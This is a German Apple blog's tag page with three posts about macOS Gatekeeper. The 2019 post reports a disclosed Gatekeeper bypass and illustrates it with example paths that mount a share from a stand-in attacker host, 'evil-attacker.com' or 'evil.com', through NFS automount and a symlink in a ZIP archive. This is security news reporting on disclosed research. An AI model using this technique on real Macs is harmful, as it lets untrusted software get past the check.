• Homepage
  • Das iOS
  • App Store Perlen
  • Privates
  • Kontakt

Artikel mit Tag gatekeeper

Verwandte Tags

apple 2008 3d 3d touch 3g 4k 5g accessibility acer activity adium adobe airdrop airplay airpods airpods pro airport airports airpower airprint airtag akku aktie alexa amazon aml android angela ahrendts animoji anker anleitung antennagate aperture apfs app appel music apple arcade apple books apple cad apple car apple card apple care apple glass apple id apple music apple news apple news+ apple park apple pay apple pencil apple sim apple store apple tv apple tv+ apple watch applearcade applecard applecare appltv apps appstore arkit arm artificial intelligence asmr augmented reality award back-to-school backup beats beats 1 beats1 beddit bedienungshilfen beer bash belkin benchmark bendgate beta bildung bing bixby black friday blackberry bleutooth blog bluetooth bokeh books boon boot camp bootcamp bug bumper butterfly carekit carplay carpool karaoke catalina catalyst cebit ces challenge channels charity china chip chrome cinema display cisco classkit clips cloud cloudkit compressor connected health conrad continuity corning cortana craig federighi cyber monday cyberport dark mode dashboard datenschutz deal deloitte developer didi differential privacy disney display dock dolby atmos dresden drm dropbox dsgvo dual sim dual-sim earpods earth day echo eddy cue edge education ekg el capitan em emoji environment esim eu euro event everyone can code face id facebook faceid facepalm facetime family sharing fbi festival final cut final cut pro x find my find my iphone fire tv firefox firewire fitbit flash flexgate flickr flyover force touch fotos fotostream foxconn frankfurt frontrow fundstück fusion drive fusiondrive gadget gadgets galaxy gamecenter games garageband gate ge geekbench genius geschenkkarten google google assistant google maps gorilla glass grading gravis graykey greenpeace gymkit hacker hamburg handbrake handoff hannover haptic touch hdr health healthkit high sierra home homebutton homekit homepod how-to huawai huawei hue iad ibeacon ibm ibooks ibooks author ibookstore ical icar ichat icloud icq idisk ifixit igzo ilife imac imac pro imessage imovie in-app abo in-app purchase indien instagram intel internes internet recovery interview ios ios 7 ios ipad ipad ipad event ipad mini ipad pro ipados iphoen iphone iphone o2 iphone rumor iphone x iphoto ipod ipod nano ipod shuffle ipod touch iradio isight itunes itunes festival itunes in der cloud itunes lp itunes match itunes radio itunes tv itunes u iwatch iweb iwork jahresrückblick jailbreak java jeff williams jimmy iovine jony ive kamera karten keynote kommentar lala leak leopard lg lgbtq libratone lightning lion liquidmetal live fotos logic pro logic pro x look around lte luca maestri mac mac mini mac os mac pro macbbok macbbok pro macbook macbook air macbook pro machinenlernen macos macos update macworld magazines magic keyboard magic mouse magic trackpad magsafe mail main stage mainstage malware maps marzipan maschinenlernen mavereicks mavericks media markt mediamarkt meltdown memoji mesh mfi micro-led microled microsoft mini-led mockup mojave motion mountain lion mp3 münchen multi touch multitasking multitouch musik musikmemo mutlitasking navigon nest netflix netzneutralität news news flash newsflash nfc nike nintendo noisegate nokia notch nsa numbers o2 office oled orchard os x pages parallels partnerschaft passbook patent paypal pegatron pencil perlen personal personal hotspot phil schiller phishing ping pixel planet of the apps playgrounds pns podcast podcasts power nap powerbeats pressemitteilung pride prime prism privacy privates privatfreigabe pro display pro display xdr product red project catalyst project titan projekte promo promotion puma qi qualcomm quartalszahlen quicktime ranking ransomware reachability reading list red remote reparaturprogramm research research kit researchkit responsibility retail retina review ros roundup rückruf rumor safari salesforce samsung sap saphirglas satire saumsung schoolwork scott forstall screen time screentime scurity sdk search ads security selfie shazam shortcuts shot on iphone sicherheit sidecar sierra sierra tvos sign in with apple siri siri remote skeuomorphismus sky skype smart battery case smart connector smart cover smart glass smart home smart keyboard smartphone snow leopard software sommercamp sommerloch sonos spam spectre spende spigen spoiler spotify star starbucks steve ballmer steve jobs steve wozniak store support swatch swift t-mobile t2 tablet taptic engine teardown technik telekom terminal tesla testflight tethering texture the daily think different thunderbolt thunderbolt display ticker tidal tiger tile tim cook time capsule time machine tipp today at apple tomtom toshiba touch bar touch id touchbar trailer transparenzbericht transporter true tone truedepth tsmc turi tutorial tutorials tv tvos tvos update twitter übernahme umfrage umts umwelt umweltschutz unboxing unter der lupe update usa usb-c vein id vimeo virtual reality virus vista vodafone voice over voicemail vorschau vw walkie-talkie wallet watch os watchkit watchos wearables webclips webkit werbung whatsapp whitepaper widgets wien wifi wikipedia windows wlan wwdc xcode xserve yahoo yosemite youtube zahlen zeitungskiosk zwei-faktor authentifizierung allgemeines anyfont appel blitzangebote reminder bose gameclub gesponsert gewinnspiel ifttt jawbone joyn kindle mozilla outbank outlook photoshop rss snapchat spyware sygic tumblr uber vpn apple rumor apstore game gopro nordlocker philips hue vlc dsl iOS watchOS Xcode appe

Mai 27: Ungestopfte Sicherheitslücke in macOS erlaubt das Umgehen des Gatekeepers

Der Sicherheitsexperte Filippo Cavallarin sorgte über das Wochenende für Aufsehen, indem er eine Schwachstelle im Gatekeeper von macOS öffentlich machte, mit der sich diese Sicherheitsfunktion umgehen lässt. Dies gilt auch nach dem in der vergangenen Woche veröffentlichten Update auf macOS 10.14.5. Zur Erinnerung: Der Gatekeeper sorgt in macOS dafür, dass aus dem Internet heruntergeladene Software unmittelbar auf ihre Herkunft geprüft und der Nutzer evtl. entsprechend gewarnt wird, sollte diese nicht vertrauenswürdig sein.

Laut Cavallarin kann diese Maßnahme jedoch komplett umgangen werden, was vor allem daran liegt, dass der Gatekeeper auch externe Festplatten und Netzlaufwerke pauschal als sichere Herkunftsorte einstuft. Dies bedeutet im Imkehrschluss, dass Software von diesen Orten nicht noch einmal auf ihre Sicherheit hin überprüft werden. Dem Sicherheitsforscher zufolge kann ein Nutzer jedoch relativ einfach in eine Falle gelockt werden, ein manipuliertes Netzlaufwerk zu mounten, von dem dann Software installiert werden kann, ohne dass der Gatekeeper hier eingreift.

So könnte mit dem Pfad "ls /net/evil-attacker.com/sharedfolder/" beispielsweise der Inhalt des Ordners "sharedfolder" auf einem entfernten Server mit der Adresse "evil-attacker.com" per NFS gemountet werden. Zudem können auch in ZIP-Archiven symbolische Links enthalten sein, die ebenfalls eine Möglichkeit bieten, den Gatekeeper zu umgehen. So könnte ein solcher Link beispielsweise auf "Documents -> /net/evil.com/Documents" lauten, wodurch sich der Nutzer nicht mehr auf seinem lokalen Rechner befände, sondern auf dem Ordner "Documents" auf dem Server von evil.com.

Cavallarin habe nach eigener Aussage Apple über die Sicherheitslücke am 22. Februar informiert und das Unternehmen wollte sie eigentlich mit mscOS 10.14.5 in der vergangenen Woche stopfen. Da das 90 Tage Fenster für die Geheimhaltung der Lücke inzwischen verstrichen ist und Apple auch nicht mehr auf E-Mails von Cavallarin reagiert, wurde sie nun öffentlich gemacht. Das nachfolgende Video zeigt sie in Aktion:



YouTube Direktlink

Geschrieben von Florian Schimanke am Montag, 27. Mai 2019 um 07:39 in Mac
Kommentare: (4) Trackbacks: (0)
Tags für diesen Artikel: apple, bug, gatekeeper, mac, macos

Sep 19: Apple veröffentlicht OS X 10.7.5 inkl. Gatekeeper

Auch Mac-Nutzer, die noch nicht auf Mountain Lion umgestiegen sind dürfen sich am heutigen Abend über ein Update freuen. Zwar wurde der Vorgänger OS X Lion im Juli abgelöst, heute schiebt Apple abder die vermutlich letzte Sicherheitsaktualisierung hinterher, die wie üblich allen Anwendern des Betriebssystems empfohlen wird. Die vielleicht wichtigste und interessanteste Neuerung in OS X 10.7.5 ist die von Mountain Lion bekannte neue Sicherheitsfunktion "Gatekeeper". Hierüber hat der Nutzer die Möglichkeit, festzulegen woher die Software stammen darf, die auf seinem Mac installiert wird. Dabei kann die Wahl entweder ausschließlich auf Software aus dem Mac App Store fallen, auf Software aus dem Mac App Store oder von durch Apple zertifizierte Entwicklern oder wie gehabt Software aus beliebiger Herkunft. Als weitere Inhalte in OS X 10.7.5 nennt Apple allgemeine Fehlerbehebungen, wie zum Beispiel die Behebung eines Problems mit mangelhafter Stabilität von WLAN-Verbindungen beim iMac oder auch eine sporadisch auftretende zufälliger Sortierung von App-Icons im Launchpad.
Geschrieben von Florian Schimanke am Mittwoch, 19. September 2012 um 19:41 in Mac
Kommentar: (1) Trackbacks: (0)
Tags für diesen Artikel: apple, gatekeeper, lion, mac, os x, update

Jul 28: Erste Entwickler kehren Mac AppStore den Rücken

Während der Mac AppStore für so manchen User eine einfache und komfortable Möglichkeit ist, Software auf den Mac zu laden, werden die damit verbundenen Einschränkungen und Bedingungen für manchen Entwickler zum Ärgernis. Dies führt gar soweit, dass diverse, durchaus namhafte Entwickler ihre Apps inzwischen wieder aus dem AppStore entfernen und stattdessen wieder auf herkömmlichen Wege vertreiben. Mit dem am Mittwoch veröffentlichten OS X Mountain Lion und der darin enthaltenen Gatekeeper-Funktion dürfte sich diese Situation noch einmal verschärfen. Standardmäßig gestattet dieser nämlich ausschließlich die Installation von Apps aus dem AppStore, was für den Benutzer neben dem angesprochenen Komfort auch eine erhöhte Sicherheit vor Schadsoftware bietet. Dies liegt nicht zuletzt daran, dass Apple von Apps im Mac AppStore seit dem 01. Juni verlangt, dass diese in einer "Sandbox", also einem vom Rest des Betriebssystems abgeschotteten Bereich laufen. Und genau hierin liegt für viele Entwickler das Problem. Innerhalb der Sandbox besitzen die Apps nur begrenzte Rechte, was unter anderem dazu geführt hat, dass beispielsweise Postbox, Anbieter einer E-Mail-Software, seine Apps wieder aus dem Mac AppStore entfernt hat. Grund hierfür ist die Tatsache, dass sich durch die Sandbox keine Add-Ons mehr installieren ließen und kein direkter Zugriff mehr auf iCal und iPhoto bestand. Weiterlesen...
Geschrieben von Florian Schimanke am Samstag, 28. Juli 2012 um 18:19 in AppStore
Kommentare: (11) Trackback: (1)
Tags für diesen Artikel: apple, appstore, gatekeeper, mac, mountain lion, os x
« vorherige Seite   (Seite 1 von 1, insgesamt 3 Einträge)   nächste Seite »

Werbung:


Werbung:

Unterstützung

Alle Links in den AppStore, den, Mac AppStore den iBookstore oder iTunes Store sind Partnerlinks. Wer hierüber einkauft, unterstützt Flo's Weblog mit einen kleinen Prozentsatz des unveränderten Kaufpreises. Selbes gilt auch für Einkäufe bei Amazon und weiteren ähnlichen Anbietern. Über den PayPal-Button unter diesem Text und die Spenden-Funktion innerhalb der App besteht ebenfalls die Möglichkeit, Flo's Weblog finanziell zu unterstützen. Ich bedanke mich schon jetzt für die Unterstützung!

Kalender

Zurück Dezember '19 Vorwärts
Mo Di Mi Do Fr Sa So
            1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31          
Steve Jobs 1955-2011
 

Impressum | Datenschutz
© by Florian Schimanke | Template based on Andreas08